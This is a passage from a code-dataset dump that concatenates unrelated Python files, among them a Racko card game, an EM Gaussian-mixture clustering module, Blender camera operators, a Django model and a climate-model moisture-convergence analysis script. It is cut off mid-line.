inputs(path_to='folder')\n kwargs = {\n 'sentences_in_block': 150,\n 'check_author': False,\n 'author': ['name', 'surname'],\n 'prop': 0\n }\n props = {'-ld': 0,\n '-mw': 1,\n '-ms': 2,\n '-cs': 3}\n analysis_propertys(propertys, kwargs)\n p = input('Please analyzed property: ')\n if p in props.keys():\n kwargs['prop'] = props[p]\n print('Ceep calm...')\n functions.return_analysis_parts_folder(way_to_file, **kwargs)\n\n\nCOMMANDS = {\n 'analysis m': return_analysis_view,\n 'analysis p': return_analysis_parts_view,\n 'analysis f': return_analysis_folder_view,\n 'analysis pf': return_analysis_parts_folder_view,\n 'help': help_me,\n 'download': functions.textanalyzerlib.punkt_download\n}\n\nif __name__ == '__main__':\n help_me()\n while True:\n command = input()\n if command in COMMANDS.keys():\n try:\n COMMANDS[command]()\n except:\n print('FAILED')\n elif command.lower() == 'exit':\n break\n else:\n print('Такой команды пока что не существует')\n","sub_path":"main/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"463776360","text":"#!/usr/bin/env python3\ndef gen_combinations(collection_size, items_size, position=0, low=0, subset=None, operation=None):\n \"\"\"\n Enumerates all the possible combinations of items_size from a collection of collection_size\n Each enumeration is 0 indexed and every element in subset corresponds to item_no + 1 in collection\n Example:\n collection_size : 5\n items_size: 3\n one possible combination is subset : [ 0, 1, 2]\n this corresponds to 1st, 2nd and 3rd element in collection\n About operation:\n operation is a function which carries out user desired operation on every generated\n operations as long as user wants\n this allows complete decoupling of this function from use of combination enumeration (better unit test)\n Required parameters\n collection_size and item_size\n \"\"\"\n if collection_size < 0 or items_size < 0:\n raise ValueError('collection size and item size must be positive.')\n if items_size > collection_size:\n raise ValueError('item size must be less than or equal to collection size')\n if collection_size == items_size == 0:\n return\n if subset is None:\n subset = [-1] * items_size\n if operation is None:\n def operation(subset):\n print(subset)\n return False\n high = ((collection_size - 1) - items_size) + (position + 1)\n for i in range(low, high + 1):\n subset[position] = i\n if position == items_size - 1:\n done = operation(subset)\n if done:\n break\n else:\n gen_combinations(collection_size, items_size, position + 1, low=i + 1, subset=subset, operation=operation)\n\n\ndef calculate_distance(lat1, lon1, lat2, lon2):\n \"\"\"\n Calculates and returns the great circle distance in kms between two points\n on the earth.\n \"\"\"\n from math import radians, cos, sin, asin, sqrt\n # degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers\n return c * r\n\n\ndef get_data_from_json(file_path=None):\n \"\"\"\n requires file which contains one json string per line\n all types of errors are quite so that if this function fails, nothing else stops because of this.\n \"\"\"\n if not file_path:\n import os\n file_path = os.path.dirname(os.path.abspath(__file__)) + '/friends.json'\n import json\n try:\n data_file = open(file_path, mode='r')\n except Exception as error:\n # print(error)\n return []\n friends = []\n for line in data_file:\n try:\n friends.append(json.loads(line))\n except Exception:\n data_file.close()\n return []\n data_file.close()\n return friends\n","sub_path":"adwyze/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"248250665","text":"import bpy\n\n\nclass LookThroughSelected(bpy.types.Operator):\n bl_idname = 'scene.look_through_selected'\n bl_label = 'Look through selected'\n bl_description = 'Look Through selected light, camera or object'\n\n @classmethod\n def poll(cls, context):\n return context.object\n\n def execute(self, context):\n context.space_data.lock_camera_and_layers = False # Needs to be False\n # to active local camera\n bpy.ops.view3d.object_as_camera()\n context.scene.camera = active_camera # restore render camera\n return{'FINISHED'}\n\n\nclass LookThroughRender(bpy.types.Operator):\n bl_idname = 'scene.look_through_render'\n bl_label = 'Look through render'\n bl_description = (\n 'Look Through render camera, could be different than the local camera')\n\n def execute(self, context):\n active_camera = bpy.context.scene.camera\n context.space_data.camera = active_camera\n bpy.ops.view3d.viewnumpad(type='CAMERA')\n return{'FINISHED'}\n","sub_path":"scripts/addons/custom_tools/look_through.py","file_name":"look_through.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"94195144","text":"# Time Complexity : O(m *n)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\nclass Solution:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n res = []\n if len(matrix) == 0 or len(matrix[0]) == 0:\n return res\n \n top = 0\n bottom = len(matrix)-1\n left = 0 \n right = len(matrix[0])-1\n size = len(matrix) * len(matrix[0])\n \n while len(res) < size:\n # top row\n for i in range(left, right+1):\n if len(res) < size:\n res.append(matrix[top][i])\n top += 1\n \n # right column\n for i in range(top, bottom+1):\n if len(res) < size:\n res.append(matrix[i][right])\n right -= 1\n #buttom\n for i in range(right, left-1, -1):\n if len(res) < size:\n res.append(matrix[bottom][i])\n bottom -= 1\n #left\n for i in range(bottom, top-1, -1):\n if len(res) < size:\n res.append(matrix[i][left])\n left += 1\n \n return res\n","sub_path":"sprial_travel.py","file_name":"sprial_travel.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"220199383","text":"import os\nimport sys\nimport glob\nfrom collections import Counter\n\nimport torch\n\ncurrent_path = os.getcwd()\nsys.path.append(current_path)\nfrom nslt.models.model_saver import load_checkpoint\n\n\nsave_dir = \"save\"\nexp = \"gloss-lstm2\"\nmode = \"valid\"\nstep = 8000\nckpt_path = f\"{save_dir}/{exp}/checkpoints/ckpt_{step:08d}.pt\"\nresult_file = f\"{save_dir}/{exp}/results/{mode}_pred_{step:08d}txt\"\nassert os.path.exists(result_file)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nwith open(result_file, \"r\") as f:\n data = f.readlines()\n\ncounter = Counter()\n\nfor line in data:\n word_list = line[:-1].split(\" \")\n counter.update(word_list)\n\nprint(len(counter))\n\nconfig, vocab, model, optim = load_checkpoint(ckpt_path, device, use_fields=False)\n\nprint(model)\n","sub_path":"runs/check_checkpoint_model.py","file_name":"check_checkpoint_model.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"12552151","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\nclass Comentario(models.Model):\n usuario = models.ForeignKey(User,on_delete=models.CASCADE)\n descricao = models.TextField()\n date = models.DateTimeField(auto_now_add=True)\n aprovado = models.BooleanField(default=False)\n\n def __str__(self):\n return self.usuario.username\n","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"557679869","text":"'''\nProgram: CS 115 Project 3: Racko!\nAuthor:Christian Esperon\nDescription: Racko is a card game in which the user must try to achieve a hand of cards in\n ascending order before the computer does.First to do so achieves a Racko and\n wins the game.\n'''\n\n#Define a global variable to denote the total number of cards.\n#In the actual game, this will be equal to 60 but for testing we use smaller numbers\nnumCards = 9 #9, 12, 60\n\n#Define a global variable to denote the size of rack (number of cards in user's hand).\n#In the actual game, this will be equal to 10 but for testing we use smaller numbers\nrackSize = 3 #3, 4, 10\n\nimport sys\nimport random\n\ndef get_top_card(list):\n \"\"\"\n Gets the top card from any any given deck.\n\n Parameter: deck\n Returns: top card from deck\n \"\"\"\n top_card=list.pop()\n return top_card\n\ndef add_card_to_discard(card,discard):\n \"\"\"\n Adds a card to the discard pile.\n\n Parameter: unwanted card; discard pile\n Returns: nothing\n \"\"\"\n\n discard.append(card)\n\n\ndef find_and_replace(newcard,card2br,hand, discard):\n \"\"\"\n Adds newcard to hand and places unwanted card into the discard pile.\n\n Parameter: desired card; card to be replaced; hand; discard pile\n Returns nothing\n \"\"\"\n\n\n for i in range (len(hand)):\n if hand[i] == card2br:\n hand[i]= newcard\n add_card_to_discard(card2br,discard)\n\ndef shuffle(card_stack):\n \"\"\"\n Shuffles any given deck\n\n Parameter: List(deck of cards)\n Returns: nothing\n \"\"\"\n\n random.shuffle(card_stack)\n\n\ndef deal_initial_hands(deck):\n \"\"\"\n Deals out two hands of cards.\n\n Parameter: List(deck)\n Returns: Two lists which represent to card hands\n \"\"\"\n\n hand1=[]\n hand2=[]\n top_card_user = get_top_card(deck)\n hand1.append(top_card_user)\n top_card_user2=get_top_card(deck)\n hand2.append(top_card_user2)\n\n while (len(hand1)) < rackSize and (len(hand2)) < rackSize :\n\n top_card_user = get_top_card(deck)\n hand1.append(top_card_user)\n top_card_user2= get_top_card(deck)\n hand2.append(top_card_user2)\n\n\n return hand1,hand2\n\ndef check_racko(hand):\n \"\"\"\n Verifies if the given hand is a sorted list.\n\n Parameter: hand of cards\n Returns: True or False\n \"\"\"\n\n if sorted(hand) == hand:\n return True\n\n else:\n\n return False\n\ndef replaceDeck(card_stack):\n \"\"\"\n Takes the discard pile and shuffles it, that then becomes the new deck\n and the top card from new deck becomes the discard pile.\n Parameter: List of numbers in discard pile\n Returns: Two lists the new deck; and new discard pile\n \"\"\"\n\n shuffle(card_stack)\n discard_pile=[]\n\n discard_pile.append(card_stack.pop())\n\n\n return discard_pile,card_stack\n\ndef computer_play(computer_hand, deck, discard):\n\n #Define a variable to specify the numbers that can be \"allotted\" to a single card in the rack\n div = numCards // rackSize\n\n #print lists corresponding to deck, discard pile and computer's current hand\n print('deck:')\n print(deck)\n print('discard pile:')\n print(discard)\n print()\n print(\"Computer's current hand:\")\n print(computer_hand)\n\n\n\n #randomly decide whether to choose from the discard pile or deck\n #coin = random.random() #import random for this to work\n coin = random.random()\n if coin > 0.5:\n # Show the discard card\n discard_card = get_top_card(discard)\n #Choose a card to kick out\n #First determine index where discard_Card should be inserted.\n #Estimate it by dividing the discard Card with numbers per rack (div)\n print(\"Computer: Chooses top discard card \" + str(discard_card))\n loc = (discard_card - 1) // div\n\n #Replace by whatever card is in computer's hand at this index\n number_of_card = computer_hand[loc]\n print(\"Computer: Replacing it with \" + str(number_of_card))\n\n #Modify the discard pile and the computer's hand\n find_and_replace(discard_card,computer_hand[loc],computer_hand,discard)\n\n print(\"Computer's new hand: \")\n print(computer_hand)\n print()\n\n\n else:\n # Pick the top card from deck and print it out\n deck_card = get_top_card(deck)\n print(\"Computer: Chooses top card from the deck \" + str(deck_card))\n\n coin = random.random()\n #Randomly decide whether to keep the deck card or not\n if coin > 0.5:\n # Choose a card to kick out\n # First determine index where deck card should be inserted.\n print(\"Computer: Chooses top deck card \" + str(deck_card))\n\n loc = (deck_card - 1) // div\n # Replace by whatever card is in computer's hand at this index\n number_of_card = computer_hand[loc]\n print(\"Computer: Replacing it with \" + str(number_of_card))\n\n #Modify the discard pile and the computer's hand\n find_and_replace(deck_card,computer_hand[loc],computer_hand,discard)\n print(\"Computer's new hand is:\")\n print(computer_hand)\n print()\n else:\n print(\"Computer: Rejects top deck card \" + str(deck_card))\n\n #Add card to discard pile\n add_card_to_discard(deck_card,discard)\n print(\"Computer's new hand is:\")\n print(computer_hand)\n print()\n\ndef human_play(human_hand, deck, discard_pile):\n # print lists corresponding to deck, discard pile and user hand\n print('deck:')\n print(deck)\n print('discard pile:')\n print(discard_pile)\n print('Your current hand:')\n print(human_hand)\n\n # Retrieve the top card in the discard pile and ask user if they want it\n top_discard = get_top_card(discard_pile)\n print('Do you want this discard card:', top_discard)\n answer = str(input('Enter yes or no:'))\n\n if answer.lower() == 'yes':\n # Ask the user for the card (number) they want to kick out\n card_2_BR = int(input('Enter the number of the card you want to kick out:'))\n # Modify the user's hand and the discard pile\n find_and_replace(top_discard, card_2_BR, human_hand, discard_pile)\n\n # Print the user's hand\n print('Your new hand is:')\n print(human_hand)\n print()\n elif answer.lower() == 'no':\n add_card_to_discard(top_discard, discard_pile)\n # Get the top card from deck and print it to show the user what they got\n topcard_deck = get_top_card(deck)\n print('The card you get from the deck is', topcard_deck)\n # Ask the user if they want this card\n second_choice = input(\"Do you want to keep this card? Enter yes or no: \")\n if second_choice.lower() == 'yes':\n # Ask the user for the card (number) they want to kick out\n card_2_KO = int(input('Enter the number of the card you want to kick out:'))\n # Modify the user's hand and the discard pile\n find_and_replace(topcard_deck, card_2_KO, human_hand, discard_pile)\n # Print the user's hand\n print('Your new hand is:')\n print(human_hand)\n print()\n else:\n # Add card to discard pile\n add_card_to_discard(topcard_deck, discard_pile)\n\n # Print the user's hand\n print('Your new hand is:')\n print(human_hand)\n print()\n else:\n print(\"Choice can be only yes or no.\")\n sys.exit()\n\n\ndef main():\n random.seed(26)\n # Create a list of integers that represents the deck.\n # This should be numbers from 1 to numCards (see definition of numCards above)\n deck= []\n for i in range (1,numCards+1):\n\n deck.append(i)\n\n\n # shuffle the deck\n shuffle(deck)\n\n # deal initial hands\n #human_computer[0]= human hand, human_computer[1]= computer hand\n\n computer_hand, human_hand= deal_initial_hands(deck)\n # create an empty discard pile\n\n discard_pile=[]\n\n # Take out top card from the deck to begin the discard pile\n top_card= get_top_card(deck)\n add_card_to_discard(top_card,discard_pile)\n\n while check_racko(human_hand)!=True and check_racko(computer_hand)!=True:\n\n if check_racko(computer_hand)== False:\n human_play(human_hand,deck,discard_pile)\n\n if len(deck) == 0:\n print(\" \\nUser: WOAH! Deck is empty.Shuffling discard pile and using that as the new deck.\")\n # Call replaceDeck to get the lists corresponding to the new deck and discard pile\n discard_pile, deck = replaceDeck(discard_pile)\n\n\n if check_racko(human_hand)== False:\n computer_play(computer_hand,deck,discard_pile)\n\n if len(deck) == 0:\n print(\" \\nComputer: WOAH! Deck is empty. Shuffling discard pile and using that as the new deck.\\n\")\n # Call replaceDeck to get the lists corresponding to the new deck and discard pile\n discard_pile, deck=replaceDeck(discard_pile)\n # Outside the while loop. We have a winner. Declare the winner along with the winner's hand.\n\n if check_racko(human_hand)== True:\n print('HUMAN WINS! with hand of',human_hand)\n else:\n print('COMPUTER WINS! with hand of', computer_hand)\n\n\nmain()","sub_path":"cs115-Programming I/Project 3/project3.py","file_name":"project3.py","file_ext":"py","file_size_in_byte":9304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224412397","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom IPython.display import display, clear_output\nimport time\nfrom scipy import stats\nfrom helper import *\nfrom kmeans import *\nfrom scipy.stats import multivariate_normal as mvn\n\n\ndef _em_expectation(X, pi, mu, var):\n N, P = X.shape\n K = len(pi)\n q = np.zeros((K, N))\n for k in range(K):\n for n in range(N):\n gdist = mvn.pdf(X[n], mu[k], var[k])\n q[k, n] = pi[k]*gdist\n acc = np.sum(q, axis=0)\n for k in range(K): \n q[k, :] /= acc\n return q\n\n\n\ndef em_fit(X, *params):\n pzx = _em_expectation(X, *params)\n Y = np.argmax(pzx, axis=0)\n return Y\n\n\ndef complete_likelihood(X, pi, mu, var):\n q = _em_expectation(X, pi, mu, var)\n return np.sum(np.log(q))\n\n\n\ndef _em_maximisation(X, K, q, isotropic=False):\n N, P = X.shape\n mu = np.zeros((K, P))\n var = np.zeros((K, P, P))\n pi = np.zeros(K)\n sum_q = np.sum(q, axis=1)\n \n for k in range(K):\n mu[k] = np.average(X, axis=0, weights=q[k])\n pi[k] = np.mean(q[k])\n if isotropic:\n norm = np.diag((X-mu[k]).dot((X-mu[k]).T))\n v = np.sum(q[k]*norm)/(P*np.sum(q[k])) \n var[k, ...] = v * np.eye(P)\n else:\n sk = np.zeros((P, P))\n for i in range(N):\n diff = X[i] - mu[k]\n sk += diff.reshape(P,1).dot(diff.reshape(1,P))*q[k,i]\n var[k, ...] = sk/sum_q[k]\n return pi, mu, var\n \n\ndef _estimate_params(X, Y, K):\n N, P = X.shape\n mu = np.zeros((K, P))\n Yold = np.zeros(N)\n var = np.zeros((K, P, P))\n pi = np.zeros(K)\n for k in range(K):\n Xk = X[Y == k]\n Nk = len(Xk)\n pi[k] = Nk/N\n mu[k, :] = np.mean(Xk, axis=0)\n var[k, ...] = np.cov(Xk.T)\n return pi, mu, var\n\n\ndef em_train(X, K, vis=\"all\", max_iter=100, isotropic=False):\n N, P = X.shape\n Yold = np.zeros(N)\n colors = np.array([(0.9, 0, 0), (0, 0.9, 0), (0, 0, 0.9), (0.5, 0.5, 0.5)], dtype=float)\n llikehood = []\n \n # initialisation\n Y, _ = kmeans(X, K, vis=\"none\", max_iter=100, plusplus=True)\n pi, mu, var = _estimate_params(X, Y, K)\n \n n = 0\n while (Y - Yold).any() != 0 and n < max_iter: \n n += 1\n Yold = Y.copy()\n \n # expectation\n q = _em_expectation(X, pi, mu, var)\n \n # maximization\n pi, mu, var = _em_maximisation(X, K, q, isotropic=isotropic)\n \n # clustering\n Y = em_fit(X, pi, mu, var)\n \n # plotting\n if vis == \"all\":\n plot_em(X, pi, mu, var, colors, n)\n \n # likelihood\n llikehood.append(complete_likelihood(X, pi, mu, var))\n \n return pi, mu, var, llikehood\n\n\n\n\ndef plot_em(X, pi, mu, var, colors, n=-1):\n K = len(pi)\n N, P = X.shape\n plt.cla()\n ax = plt.gca()\n plt.axis('equal')\n pzx = _em_expectation(X, pi, mu, var)\n c = pzx.T.dot(colors[:K])\n# for i in range(N):\n plt.scatter(X[:,0], X[:,1], color=c, s=1)\n for k in range(K):\n plt.plot(mu[k,0], mu[k,1], \"k*\")\n plot_ellipse(mu[k], var[k], ax,alpha=0.3, color=colors[k])\n plt.grid()\n plt.draw()\n if n > 0:\n plt.title(f\"EM at step {n}\")\n time.sleep(0.1)\n display(plt.gcf(), display_id=True)\n clear_output(wait=True)","sub_path":"ProbabilisticGraphicalModel/Homework3/em.py","file_name":"em.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39573790","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\norig: 00_scripts/12_00_convergence_PUB.py\ndescription\t Investigate diurnal cycle of convergence of moisture over\n Alpine Region. \nauthor\t\t\tChristoph Heim\ndate created 28.05.2019\ndate changed 02.03.2020\nusage\t\t\tno args\nnotes\t\t\tFigure 11 in paper.\n==============================================================================\n\"\"\"\nimport os, time, pickle, copy\nimport xarray as xr\nimport numpy as np\nfrom datetime import time as dttime\nfrom datetime import datetime,timedelta\nos.chdir('00_scripts/')\nfrom package.utilities import dt64_to_dt, Timer, calc_mean_diurnal_cycle\nimport matplotlib.pyplot as plt\n\ndef unstaggering(field):\n if 'srlon' in field.dims:\n field = field.rename({'srlon':'rlon'})\n field.coords['rlon'].values += np.mean(\n np.diff(field.coords['rlon'].values))/2\n if 'srlat' in field.dims:\n field = field.rename({'srlat':'rlat'})\n field.coords['rlat'].values += np.mean(\n np.diff(field.coords['rlat'].values))/2\n field.coords['rlon'].values = np.round(field.coords['rlon'].values,3)\n field.coords['rlat'].values = np.round(field.coords['rlat'].values,3)\n return(field)\n\n \nif __name__ == '__main__':\n ####################### NAMELIST INPUTS FILES #######################\n i_recompute_1 = 0\n i_recompute_2 = 0\n plot_path = os.path.join('..','00_plots', '14_convergence')\n resolutions = ['4', '2', '1']\n #resolutions = ['4']\n member_types = ['RAW', 'SM']\n\n\n dx = {'4':4400,'2':2200,'1':1100}\n\n inp_path = os.path.join('..','02_fields', 'topocut')\n #inp_path_diurnal = os.path.join('..','02_fields', 'diurnal')\n\n fluxes = {\n 'W':{'field':'zU','dir': 1,'mean':'rlon','mean_ind': 0,'sum':'rlat',}, \n 'E':{'field':'zU','dir':-1,'mean':'rlon','mean_ind':-1,'sum':'rlat',}, \n 'S':{'field':'zV','dir': 1,'mean':'rlat','mean_ind': 0,'sum':'rlon',}, \n 'N':{'field':'zV','dir':-1,'mean':'rlat','mean_ind':-1,'sum':'rlon',}, \n }\n\n\n start_time = datetime(2006,7,11,0)\n end_time = datetime(2006,7,20,0)\n\n #start_time = datetime(2006,7,12,0)\n #end_time = datetime(2006,7,14,0)\n\n\n dom_alpine_region = {\n 'code':'alpine_region',\n 'label':'Alpine Region',\n #'rlon':(-3.76,3.68),\n #'rlat':(-3.44,1.08),}\n 'rlon':(-3.775, 3.705),\n 'rlat':(-3.455, 1.105),\n 'altitudes':slice(0,2500),}\n dom_northern_italy_0_2 = {\n 'code':'northern_italy_0_2',\n 'label':'Northern Italy 0-2km',\n 'rlon':(-1.695, 0.225),\n 'rlat':(-2.495,-1.215),\n 'altitudes':slice(0,2000),}\n dom_northern_italy_2_6 = {\n 'code':'northern_italy_2_6',\n 'label':'Northern Italy 2-6km',\n 'rlon':(-1.695, 0.225),\n 'rlat':(-2.495,-1.215),\n 'altitudes':slice(2000,6000),}\n dom_alpine_ridge_15_25 = {\n 'code':'alpine_ridge_15_25',\n 'label':'Alpine Ridge 1.5-2.5km',\n 'rlon':(-1.375, 0.225),\n 'rlat':(-0.695,-0.295),\n #'rlon':(-1.78, 0.625),\n #'rlat':(-1.095,0.095),\n 'altitudes':slice(1500,2500),}\n\n #domain = dom_northern_italy_0_2\n #domain = dom_northern_italy_2_6\n #domain = dom_alpine_region\n domain = dom_alpine_ridge_15_25\n\n time_chunk = 1\n\n pickle_save_file = 'data_12_00/data_12_00_{}.pkl'.format(domain['code'])\n pickle_save_file_2 = 'data_12_00/data_12_00_{}_2.pkl'.format(domain['code'])\n pickle_save_file_3 = 'data_12_00/data_12_00_{}_3.pkl'.format(domain['code'])\n pickle_save_file_4 = 'data_12_00/data_12_00_{}_4.pkl'.format(domain['code'])\n\n ######PLOTTING\n i_plot = 0\n i_save_fig = 0\n\n plot_flux = 'TOT'\n #plot_flux = 'E'\n #plot_flux = 'W'\n #plot_flux = 'S'\n #plot_flux = 'N'\n\n mem_keys = ['SM', 'RAW', 'DIFF']\n mem_labels = ['SM', 'RAW', 'RAW - SM']\n #y_labels = [r'Lateral Vapor Convergence $[mm$ $h^{-1}]$',\n # r'Surface Pressure Anomalies $[Pa]$',\n # r'Temperature Anomalies $[K]$']\n y_labels = [r'$q_v$-convergence $[mm$ $h^{-1}]$',\n r'Pressure Anomaly $[Pa]$',\n r'Temp. Anomaly $[K]$']\n if domain['code'] in ['alpine_region']:\n ylims = [{'models':(-0.4,0.4), 'diff':(-0.2,0.2)},\n {'models':(-200,200), 'diff':(-40,40)},\n {'models':(-2.0,2.0), 'diff':(-0.40,0.40)}]\n elif domain['code'] in ['alpine_ridge_15_25']:\n ylims = [{'models':(-2.5,2.5), 'diff':(-1.0,1.0)},\n {'models':(-200,200), 'diff':(-40,40)},\n {'models':(-2.0,2.0), 'diff':(-0.40,0.40)}]\n elif domain['code'] in ['northern_italy_0_2']:\n ylims = [{'models':(-1.2,1.2), 'diff':(-1.2,1.2)},\n {'models':(-200,200), 'diff':(-40,40)},\n {'models':(-2.0,2.0), 'diff':(-0.40,0.40)}]\n else:\n ylims = [{'models':(-1.2,1.2), 'diff':(-1.2,1.2)},\n {'models':(-200,200), 'diff':(-40,40)},\n {'models':(-2.0,2.0), 'diff':(-0.40,0.40)}]\n \n percentiles = [15, 85]\n #percentiles = [20, 80]\n\n labelsize = 12\n titlesize = 14\n\n plot_dict = {\n 'res_color' :{'4':'black','2':'blue','1':'red'}, \n 'mem_linestyle' :{'RAW':'-','SM':'--','DIFF':':'},\n }\n #axes_dicts = {\n # 'W':{'col_ind':1,'row_ind':0},\n # 'E':{'col_ind':1,'row_ind':1},\n # 'N':{'col_ind':0,'row_ind':0},\n # 'S':{'col_ind':0,'row_ind':1},\n # 'TOT':{'col_ind':2,'row_ind':0},\n # 'DIFF':{'col_ind':2,'row_ind':1},\n #}\n\n plot_name = 'vapor_convergence_domain_{}_flux_{}'.format(domain['code'],\n plot_flux)\n\n ds = 0.015\n\n #####################################################################\t\t\n\n print('run for domain {}'.format(domain['label']))\n\n dt_range = np.arange(start_time, end_time+timedelta(hours=1),\n timedelta(hours=1)).tolist()\n\n\n timer = Timer()\n\n t_start = time.time()\n print('Loading')\n if i_recompute_1:\n timer.start('compute 1')\n\n ##################################\n members = {}\n # non diurnally aggregated:\n members_disagg = {}\n for res in resolutions:\n\n # get area of domain\n path = os.path.join(inp_path, 'RAW'+str(res), 'zQV.nc')\n qv = xr.open_dataset(path, )['QV']\n qv = qv.sel(rlon=slice(domain['rlon'][0],domain['rlon'][1]),\n rlat=slice(domain['rlat'][0],domain['rlat'][1]))\n area = len(qv.coords['rlon']) * len(qv.coords['rlat']) * dx[res]**2\n\n # load all members\n n_nan_members = {}\n for member_type in member_types:\n member_str = member_type+str(res)\n print(member_str)\n all_fields = []\n all_fields_disagg = []\n n_nan = {}\n for flx_key,flx_dict in fluxes.items():\n print('\\t {}'.format(flx_key))\n\n timer.start('loading')\n path = os.path.join(inp_path, \n member_str, flx_dict['field']+'.nc')\n #field = xr.open_dataset(path, \n # chunks={'time':time_chunk})[flx_dict['field'][1:]]\n #field = xr.open_dataset(path, chunks={})[flx_dict['field'][1:]]\n field = xr.open_dataset(path)[flx_dict['field'][1:]]\n\n path = os.path.join(inp_path, \n member_str, 'zRHO.nc')\n #rho = xr.open_dataset(path, \n # chunks={'time':time_chunk})['RHO']\n #rho = xr.open_dataset(path, chunks={})['RHO']\n rho = xr.open_dataset(path)['RHO']\n\n path = os.path.join(inp_path, \n member_str, 'zQV.nc')\n #qv = xr.open_dataset(path, \n # chunks={'time':time_chunk})['QV']\n #qv = xr.open_dataset(path, chunks={})['QV']\n qv = xr.open_dataset(path)['QV']\n timer.stop('loading')\n\n timer.start('altsel')\n # select time and altitue\n field = field.sel(time=slice(start_time,end_time),\n altitude=domain['altitudes'])\n timer.stop('altsel')\n\n # rename staggered dimensions\n timer.start('unstagger')\n field = unstaggering(field)\n rho = unstaggering(rho)\n qv = unstaggering(qv)\n field = field.sel(time=slice(start_time,end_time),\n altitude=domain['altitudes'],\n rlat=slice(domain['rlat'][0]-3*ds,\n domain['rlat'][1]+3*ds),\n rlon=slice(domain['rlon'][0]-3*ds,\n domain['rlon'][1]+3*ds))\n rho = rho.sel(time=slice(start_time,end_time),\n altitude=domain['altitudes'],\n rlat=slice(domain['rlat'][0]-3*ds,\n domain['rlat'][1]+3*ds),\n rlon=slice(domain['rlon'][0]-3*ds,\n domain['rlon'][1]+3*ds))\n qv = qv.sel(time=slice(start_time,end_time),\n altitude=domain['altitudes'],\n rlat=slice(domain['rlat'][0]-3*ds,\n domain['rlat'][1]+3*ds),\n rlon=slice(domain['rlon'][0]-3*ds,\n domain['rlon'][1]+3*ds))\n timer.stop('unstagger')\n\n # compute mass flux\n timer.start('mult')\n field = field * rho * qv\n #field = field * rho\n timer.stop('mult')\n\n # select directional and perpendicular dimension \n kwargs = {flx_dict['mean']:slice(\n domain[flx_dict['mean']][flx_dict['mean_ind']]-2*ds,\n domain[flx_dict['mean']][flx_dict['mean_ind']]+ds),\n flx_dict['sum']:slice(\n domain[flx_dict['sum']][0], domain[flx_dict['sum']][1]),}\n timer.start('sel')\n field = field.sel(**kwargs)\n timer.stop('sel')\n print('\\t\\t {}'.format(field.values.shape))\n\n timer.start('aggreg')\n # aggregate in directional dimesion\n field = field.mean(dim=flx_dict['mean'])\n n_nan[flx_key] = np.sum(np.isnan(field.isel(time=0).values))\n # aggregate in perpendicular dimesion\n field = field.sum(dim=flx_dict['sum'])*dx[res]\n # aggreagte vertically\n field = field.integrate(dim=['altitude'])\n timer.stop('aggreg')\n timer.start('integ')\n # multiply with unit vector of direction\n field.values = field.values * flx_dict['dir']\n # convert to [mm h-1] within domain\n field.values = field.values / area * 3600\n print('\\t\\t\\t {}'.format(field.mean().values))\n timer.stop('integ')\n\n # label according to flux name\n field = field.rename(flx_key)\n\n all_fields_disagg.append(copy.copy(field))\n #calculate diurnal cycle and store\n field = calc_mean_diurnal_cycle(field)\n all_fields.append(field)\n\n\n n_nan_members[member_str] = n_nan\n print(n_nan_members)\n\n all_fields = xr.merge(all_fields)\n all_fields_disagg = xr.merge(all_fields_disagg)\n members[member_str] = all_fields\n members_disagg[member_str] = all_fields_disagg \n\n print(n_nan_members)\n\n # Calculate total flux over all edges\n for res in resolutions:\n for member_type in member_types:\n member_str = member_type+str(res)\n # diurnal\n fields = members[member_str]\n fields['TOT'] = (fields['W'] + fields['E'] + \n fields['N'] + fields['S'] )\n members[member_str] = fields\n # disaggregated\n fields = members_disagg[member_str]\n fields['TOT'] = (fields['W'] + fields['E'] + \n fields['N'] + fields['S'] )\n members_disagg[member_str] = fields\n\n # Calculate total flux difference between RAW and SM\n for flux_key in ['TOT', 'S', 'N', 'E', 'W']:\n for res in resolutions:\n RAW_str = 'RAW'+str(res)\n SM_str = 'SM'+str(res)\n DIFF_str = '{}_DIFF'.format(flux_key)+str(res)\n # diurnal\n diff = members[RAW_str][flux_key] - members[SM_str][flux_key]\n members[DIFF_str] = diff\n # disaggregated\n diff = members_disagg[RAW_str][flux_key] - members_disagg[SM_str][flux_key]\n members_disagg[DIFF_str] = diff\n\n pickle.dump(members, open(pickle_save_file, 'wb'))\n pickle.dump(members_disagg, open(pickle_save_file_3, 'wb'))\n\n timer.stop('compute 1')\n #########################################\n\n if i_recompute_2:\n timer.start('compute 2')\n members = {}\n # non diurnally aggregated:\n members_disagg = {}\n for res in resolutions:\n\n # load all members\n for member_type in member_types:\n member_str = member_type+str(res)\n print(member_str)\n\n all_fields = {}\n all_fields_disagg = {}\n\n path = 